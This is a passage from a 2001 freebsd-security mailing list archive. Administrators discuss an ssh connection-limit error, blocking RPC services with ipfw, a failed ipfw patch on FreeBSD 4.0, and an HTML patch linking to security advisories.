solution (short of upgrading to 4.2-RELEASE or better?) --=20 --------------------------------------------------------------- Dipl.-Inform. Martin Ibert - phone: +49-30-20631-607, fax: -199 - ASDIS Software AG, Neue Gr=FCnstra=DFe 25, D-10179 Berlin-Mitte - ---------------- http://www.asdis.de/ -- mailto:mib@asdis.de -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 9:44:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.zuhause.org (zuhause.org [205.215.217.178]) by hub.freebsd.org (Postfix) with ESMTP id 7611837B401 for ; Fri, 26 Jan 2001 09:44:36 -0800 (PST) Received: by mail.zuhause.org (Postfix, from userid 1001) id 870657C83; Fri, 26 Jan 2001 11:44:35 -0600 (CST) From: Bruce Albrecht MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14961.46979.314273.536660@localhost.zuhause.org> Date: Fri, 26 Jan 2001 11:44:35 -0600 (CST) To: freebsd-security@freebsd.org Subject: wierd ssh failure X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I was trying to log onto my FreeBSD box today from work via ssh after an ssh session apparently terminated, and for about 5 minutes I was getting an error something like "User does not exist! Go away!". Since this is not normal behaviour for ssh, does anyone have any idea what might have happened? Could someone be doing a man-in-the-middle attack on me? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 9:52: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id E0B5437B402 for ; Fri, 26 Jan 2001 09:51:43 -0800 (PST) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Fri, 26 Jan 2001 09:49:49 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f0QHpmh66612; Fri, 26 Jan 2001 09:51:48 -0800 (PST) (envelope-from cjc) Date: Fri, 26 Jan 2001 09:51:47 -0800 From: "Crist J. Clark" To: David La Croix Cc: "Scot W. Hetzel" , freebsd-security@FreeBSD.ORG Subject: Re: buffer overflows in rpc.statd? Message-ID: <20010126095147.A66394@rfx-216-196-73-168.users.reflex> Reply-To: cjclark@alum.mit.edu References: <026c01c086f6$c2c151e0$7d7885c0@genroco.com> <200101251804.NAA00434@cowpie.acm.vt.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200101251804.NAA00434@cowpie.acm.vt.edu>; from dlacroix@cowpie.acm.vt.edu on Thu, Jan 25, 2001 at 12:04:32PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jan 25, 2001 at 12:04:32PM -0600, David La Croix wrote: [snip] > BTW... not that I know of any specific exploits for Rpc.* family servers, For all RPCs across all architetures? Whoo. That'd be a long list of well known exploits. > but I would recommend setting up firewall rules to prevent anyone you > don't trust from accessing those services (or any other services you > might be paranoid about). I wanted to point out that you cannot really 'block' RPC services effectively with ipfw(8) rules. RPC services do not live on certain well-known ports[0]. The only way you can effectively block RPC services is with default deny rules. This also is problematic if you for some insane reason wished to allow access to a specific RPC service through a firewall. There is no single set of ports to open up to let the traffic through. RPC proxies would be the solution for that case. [0] The major exception to this is the portmapper which lives at 111 TCP and UDP. It is the one that provides the RPC-number-to-port-number map, and thus needs to be someplace where you can find it. Another exception to this rule is NFS which pretty much always lives on 2049 TCP or UDP. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 9:52:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from vexpert.dbai.tuwien.ac.at (vexpert.dbai.tuwien.ac.at [128.130.111.12]) by hub.freebsd.org (Postfix) with ESMTP id 64F0037B404; Fri, 26 Jan 2001 09:52:05 -0800 (PST) Received: from deneb.dbai.tuwien.ac.at (deneb [128.130.111.2]) by vexpert.dbai.tuwien.ac.at (8.11.1/8.11.1) with ESMTP id f0QHq3e02375; Fri, 26 Jan 2001 18:52:03 +0100 (MET) Received: from localhost (pfeifer@localhost) by deneb.dbai.tuwien.ac.at (8.11.1/8.11.1) with ESMTP id f0QHq2V15065; Fri, 26 Jan 2001 18:52:03 +0100 (CET) (envelope-from pfeifer@dbai.tuwien.ac.at) X-Authentication-Warning: deneb.dbai.tuwien.ac.at: pfeifer owned process doing -bs Date: Fri, 26 Jan 2001 18:52:02 +0100 (CET) From: Gerald Pfeifer To: Kris Kennaway Cc: , Subject: Re: Security Advisories and the Announcements page In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org So, I now submitted a patch as you had asked, but didn't get any response at at all (and the page has not been updated either). :-( Gerald On Thu, 23 Nov 2000, Gerald Pfeifer wrote: > On Wed, 22 Nov 2000, Kris Kennaway wrote: >> Can you submit a patch please? > > Well, it's really just one line, but here we go. The patch below is for > . > > I intentionally use lower-case HTML tags, as this is what XHTML 1.0 (and > thus any forthcoming standard) demands and also added a missing full-stop > in the Java paragraph. > > Gerald > > --- newsflash.html.1 Tue Nov 14 07:14:14 2000 > +++ newsflash.html Thu Nov 23 02:37:24 2000 > @@ -26,13 +26,16 @@ > subscribe to the freebsd-announce > mailing list.

> > +

For FreeBSD Security Advisories, please refer to the our + href="/security/#adv">Security Information page.

> + >

The FreeBSD Real-Quick (TM) > Newsletter (RQN) is a monthly (sometimes bi-weekly) newsletter > containing recent developments in the FreeBSD arena. Subscribe to > freebsd-announce > to receive this newsletter via e-mail.

> > -

For latest news of FreeBSD Java Project please visit FreeBSD/Java NewsFlash page

> +

For latest news of FreeBSD Java Project please visit FreeBSD/Java NewsFlash page.

> >

For a detailed description of past, present, and future releases, > see the Release > > -- Gerald "Jerry" pfeifer@dbai.tuwien.ac.at http://www.dbai.tuwien.ac.at/~pfeifer/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 9:53: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 64A3E37B6A7 for ; Fri, 26 Jan 2001 09:52:18 -0800 (PST) Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f0QHqDs33135; Fri, 26 Jan 2001 09:52:13 -0800 (PST) (envelope-from dillon) Date: Fri, 26 Jan 2001 09:52:13 -0800 (PST) From: Matt Dillon Message-Id: <200101261752.f0QHqDs33135@earth.backplane.com> To: Bruce Albrecht Cc: freebsd-security@FreeBSD.ORG Subject: Re: wierd ssh failure References: <14961.46979.314273.536660@localhost.zuhause.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :I was trying to log onto my FreeBSD box today from work via ssh after :an ssh session apparently terminated, and for about 5 minutes I was :getting an error something like "User does not exist! Go away!". :Since this is not normal behaviour for ssh, does anyone have any idea :what might have happened? Could someone be doing a man-in-the-middle :attack on me? : ssh has a really ridiculously low default connections/second limit, you might have hit that (or maybe not, I don't get 'user does not exist' errors when I overrun it). Look in your /etc/ssh/sshd_config. The limit has been depreciated (removed) in -current and -stable, but was present in 4.2-REL. Here's what I get: -Matt fire:/home/dillon> ssh earth (success) ... fire:/home/dillon> ssh earth ... fire:/home/dillon> ssh earth ... fire:/home/dillon> ssh earth ... fire:/home/dillon> ssh earth ... fire:/home/dillon> ssh earth ... fire:/home/dillon> ssh earth ... fire:/home/dillon> ssh earth ... fire:/home/dillon> ssh earth Last login: Fri Jan 26 09:46:52 2001 from fire.emery.backp Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.2-STABLE (EARTH) #0: Tue Nov 28 13:15:10 PST 2000 Welcome to FreeBSD! You have mail. earth:/home/dillon> logout Connection to earth.emery.backplane.com closed. fire:/home/dillon> ssh earth ssh_exchange_identification: Connection closed by remote host fire:/home/dillon> ssh earth ssh_exchange_identification: Connection closed by remote host fire:/home/dillon> ssh earth ssh_exchange_identification: Connection closed by remote host fire:/home/dillon> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 9:57:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from barabas.bitstream.net (barabas.bitstream.net [216.243.128.159]) by hub.freebsd.org (Postfix) with SMTP id 82F1F37B400 for ; Fri, 26 Jan 2001 09:57:33 -0800 (PST) Received: (qmail 28281 invoked from network); 26 Jan 2001 17:57:32 -0000 Received: from unknown (HELO dmitri.bitstream.net) (216.243.132.33) by barabas with SMTP; 26 Jan 2001 17:57:32 -0000 Date: Fri, 26 Jan 2001 11:51:53 -0600 (CST) From: Dan Debertin To: Cc: David La Croix , "Scot W. Hetzel" , Subject: Re: buffer overflows in rpc.statd? In-Reply-To: <20010126095147.A66394@rfx-216-196-73-168.users.reflex> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 26 Jan 2001, Crist J. Clark wrote: > > I wanted to point out that you cannot really 'block' RPC services > effectively with ipfw(8) rules. RPC services do not live on certain > well-known ports[0]. The only way you can effectively block RPC > services is with default deny rules. I've gotten around this in the past by putting 'rpcinfo -p | awk' commands in rc.firewall, polling the portmapper on protected hosts and then building firewall rules dynamically for them. It doesn't completely work, because you have to flush & reload your rules when an NFS server bounces, but for cases where that's "good enough", it does the job. ~Dan D. -- ++ Unix is the worst operating system, except for all others. ++ Dan Debertin ++ Senior Systems Administrator ++ Bitstream Underground, LLC ++ airboss@bitstream.net ++ (612)321-9290 x108 ++ GPG Fingerprint: 0BC5 F4D6 649F D0C8 D1A7 CAE4 BEF4 0A5C 300D 2387 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 11:13:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id DA14237B404; Fri, 26 Jan 2001 11:13:35 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0QJGui82411; Fri, 26 Jan 2001 11:16:56 -0800 (PST) (envelope-from kris) Date: Fri, 26 Jan 2001 11:16:53 -0800 From: Kris Kennaway To: Gerald Pfeifer Cc: Kris Kennaway , freebsd-doc@freebsd.org, freebsd-security@freebsd.org Subject: Re: Security Advisories and the Announcements page Message-ID: <20010126111653.A75150@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="mP3DRpeJDSE+ciuQ" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from pfeifer@dbai.tuwien.ac.at on Fri, Jan 26, 2001 at 06:52:02PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --mP3DRpeJDSE+ciuQ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Fri, Jan 26, 2001 at 06:52:02PM +0100, Gerald Pfeifer wrote: > So, I now submitted a patch as you had asked, but didn't get any response > at at all (and the page has not been updated either). What's the PR number? Kris -- NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --mP3DRpeJDSE+ciuQ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6cc0kWry0BWjoQKURAsSoAKDS/AV4fNKsNR8RW9SczVzgifEYzwCfTwNd B5qYB1JEMgNwLa+CmGgJHeQ= =8bpt -----END PGP SIGNATURE----- --mP3DRpeJDSE+ciuQ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 11:23:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id A51AE37B400 for ; Fri, 26 Jan 2001 11:23:00 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0QJQ9382569; Fri, 26 Jan 2001 11:26:09 -0800 (PST) (envelope-from kris) Date: Fri, 26 Jan 2001 11:26:09 -0800 From: Kris Kennaway To: Mehmet Hinc Cc: Justin Stanford , security@FreeBSD.ORG Subject: Re: ipfw security patch problem.. Message-ID: <20010126112609.C75150@citusc17.usc.edu> References: <3A718C97.E45FA754@pozitif.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="cvVnyQ+4j833TQvp" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A718C97.E45FA754@pozitif.net>; from marduk@pozitif.net on Fri, Jan 26, 2001 at 04:41:28PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --cvVnyQ+4j833TQvp Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jan 26, 2001 at 04:41:28PM +0200, Mehmet Hinc wrote: > Yup, I`ve heard this problem and I tried to solve it.I copied > /sys/netinet/ip_fw.h to /usr/include/netine and then I recompiled my > kernel . Just for my future reference, were the instructions in the advisory which tell you to recompile your kernel unclear? Rather a lot of people seem to be making this mistake. Kris --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --cvVnyQ+4j833TQvp Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6cc9RWry0BWjoQKURAqaIAJ96W85Kg/ygNZp1rcYUkCPurhrHLACg3KNr NXuD3xpmhGLe6PoGSV+bhDU= =oYoR -----END PGP SIGNATURE----- --cvVnyQ+4j833TQvp-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 11:24:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 409D737B400 for ; Fri, 26 Jan 2001 11:24:32 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0QJRqC82601; Fri, 26 Jan 2001 11:27:52 -0800 (PST) (envelope-from kris) Date: Fri, 26 Jan 2001 11:27:52 -0800 From: Kris Kennaway To: Martin Ibert Cc: freebsd-security@FreeBSD.ORG Subject: Re: Another problem with the ipfw patch - even bigger hole in the firewall on 4.0R (was: Re: ipfw security patch problem..) Message-ID: <20010126112752.D75150@citusc17.usc.edu> References: <5.0.0.25.1.20010126173443.02d9e1e8@pop3.itp.asdis.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="0vzXIDBeUiKkjNJl" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <5.0.0.25.1.20010126173443.02d9e1e8@pop3.itp.asdis.de>; from mib@asdis.de on Fri, Jan 26, 2001 at 05:36:33PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --0vzXIDBeUiKkjNJl Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jan 26, 2001 at 05:36:33PM +0100, Martin Ibert wrote: > We also tried to patch a 4.0-RELEASE system. We worked according to the= =20 > step-by-step instructions provided in the advisory. Some patches were=20 > rejected and had to be done by hand, but apart from that, no major proble= ms=20 > were discovered during build and install. >=20 > However, the resulting combination of kernel and ipfw tool did not work! = It=20 > appears that the firewall took EVERY tcp packet to be part of an=20 > "establised" connection and happily past setup packets in and out. I didn't test the patches on 4.0 since that isn't a supported release..there have been quite a few other changes to ipfw since 4.0, so chances are there are other things that need to be patched. Upgrading to 4.2 will be your best bet for this and future advisories. Kris -- NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --0vzXIDBeUiKkjNJl Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6cc+3Wry0BWjoQKURAomoAKC9nZMz8RDL65rDaTwquIMBInRGZQCgoi2h DVRo7ikptL6K+XRwTjtajo4= =P4N9 -----END PGP SIGNATURE----- --0vzXIDBeUiKkjNJl-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 11:30:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from vexpert.dbai.tuwien.ac.at (vexpert.dbai.tuwien.ac.at [128.130.111.12]) by hub.freebsd.org (Postfix) with ESMTP id 42CBE37B400; Fri, 26 Jan 2001 11:30:14 -0800 (PST) Received: from deneb.dbai.tuwien.ac.at (deneb [128.130.111.2]) by vexpert.dbai.tuwien.ac.at (8.11.1/8.11.1) with ESMTP id f0QJUBe04679; Fri, 26 Jan 2001 20:30:12 +0100 (MET) Received: from localhost (pfeifer@localhost) by deneb.dbai.tuwien.ac.at (8.11.1/8.11.1) with ESMTP id f0QJUB615781; Fri, 26 Jan 2001 20:30:11 +0100 (CET) (envelope-from pfeifer@dbai.tuwien.ac.at) X-Authentication-Warning: deneb.dbai.tuwien.ac.at: pfeifer owned process doing -bs Date: Fri, 26 Jan 2001 20:30:11 +0100 (CET) From: Gerald Pfeifer To: Kris Kennaway Cc: , Subject: Re: Security Advisories and the Announcements page In-Reply-To: <20010126111653.A75150@citusc17.usc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 26 Jan 2001, Kris Kennaway wrote: > What's the PR number? I didn't submit a PR but just added the web patch you had asked for to my response. The mail I sent today had a quote of that original response including the patch. Please find an updated patch below. Gerald --- newsflash.html.old Thu Jan 25 07:25:13 2001 +++ newsflash.html Fri Jan 26 20:26:11 2001 @@ -33,6 +33,9 @@ see the Release Information page.

+

For FreeBSD Security Advisories, please refer to the our Security Information page.

+

January 2001